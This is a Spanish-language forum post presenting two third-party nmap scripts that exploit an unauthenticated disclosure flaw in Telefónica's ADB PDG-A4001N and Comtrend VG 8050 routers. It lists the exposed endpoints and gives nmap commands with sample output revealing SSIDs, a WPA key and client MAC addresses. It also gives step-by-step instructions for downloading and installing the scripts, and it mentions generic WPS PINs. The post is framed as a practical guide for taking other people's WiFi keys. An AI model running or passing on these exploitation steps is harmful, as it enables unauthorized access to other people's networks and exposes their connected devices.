[h]Presentación de dos scripts *.nse (para nmap) de DanyLabs contra dos modelos de routers puestos en servicio por Telefonica :
1) El PDG-A4001N de ADB-Broadband
2) El VG 8050 de Comtrend[/h]
https://www.wifi-libre.com/img/members/3/Timo_1.jpg
¿Que tal hoy amig@ wifi-libertari@?
Ayer hemos hablado de una brecha muy interesante en los routers vodafone para fibra ( Brecha severa en los nuevos routers “fibra” Vodafone (Huawei HG253 v2) )
Podemos explotar esta brecha ( créditos vicendominguez) gracias a un script ( http-enum-vodafone-hua253s.nse )de DanyLab disponible en su rama GitHub
Si os fijéis podéis ver que DanyLab nos propone dos scripts más en su rama :
[list=1]
]http-enum-telefonica-homestation.nse (para PDG-A4001N de ADB-Broadband)/]
]http-enum-telefonica-comtrend-vg-8050.nse (para VG 8050 de Comtrend)/]
[/list]
Las tres brechas son muy similares : Permiten obtener sin permisos información critica, sobre todo la lave WPA de la red WiFi.
El PDG-A4001N (eSSID por defecto de tipo WLAN_XXXX) es un modelo que telefónica ha empezado a usar por 2011.
Es un dispositivo que conocemos bien ya que tiene varios PIN WPS genéricos y fue de los primeros modelos soportados por WPSPIN.
El VG 8050 (eSSID por defecto MOVISTAR_XXXX) aparece en el paisaje wifi español un poco más tarde, alrededor de 2013.
También conocido por ser fácilmente atacable con su PIN genérico
Vista de la interfaz incriminada con su PIN genérico
https://www.wifi-libre.com/img/members/3/timo_2.jpg
En los tres dispositivos la vulnerabilidad se situá al nivel de la gestión del certificado de autenticidad de los coockies.
Podemos acceder a algunas paginas de configuración del router gracias a coockies no autenticados y sin tener los credenciales.
En el PDG-A4001N podemos así acceder a :
[quote]http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx[/quote]
Usando el script de DanyLab podremos conseguir fácilmente la información siguiente :
[code]nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X
[/code]
Con el VG 8050 podemos acceder a las mimas paginas…
[quote]http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx[/quote]
Y podremos usar el script de DanyLab para obtener el bSSID, el eSSID, la llave WPA (y hasta la mac de los clientes conectados a la red WiFI)
[code]nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X[/code]
[h]Como usar un script *.nse (Nmap Scripting Engine)[/h]
Nuestro nmap es una herramienta fabulosa. Una de sus fuerzas es la posibilidad de crear y lanzar scripts con nuestros comandos nmap.
Estos script se distinguen por su extensión de tipo *.nse
Vamos a ver como hacemos para usar uno de estos scripts.
Lo primero que tenemos que hacer es localizar el directorio dónde nmap guarda los scripts ***.nse **(nmap lleva muchos de estos scripts por defecto que son muy interesantes)
locate *.nse
En mi caso es en /usr/local/share/nmap/scripts/
Luego simplemente copiamos el script que queremos añadir en este directorio
Ejemplo (script comtrend) :
Descargamos los scripts de Dany
svn co https://github.com/DaniLabs/scripts-nse
Copiamos el script (comtrend) en el directorio
sudo cp -r scripts-nse/trunk/http-enum-telefonica-comtrend-vg-8050.nse /usr/local/share/nmap/scripts
A la hora de redactar nuestra linea de comando nmap invocamos el script con el parámetro “–script=”
Por ejemplo; para ver la ayuda sobre el script : sudo nmap --script-help http-enum-telefonica-comtrend-vg-8050.nse
Y obtenemos información sobre el script :
[code]Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-28 13:56 CET
http-enum-telefonica-comtrend-vg-8050
Categories: default safe
https://nmap.org/nsedoc/scripts/http-enum-telefonica-comtrend-vg-8050.html
Script to detect disclosure information vulnerability from Comtrend VG 8050 Telefonica Spain[/code]
Fácil ¿No?
Una vez que habéis copiado el script en el directorio nmap dedicado podéis usar los comandos dados por DanyLab,
¡Buena pesca! :lol: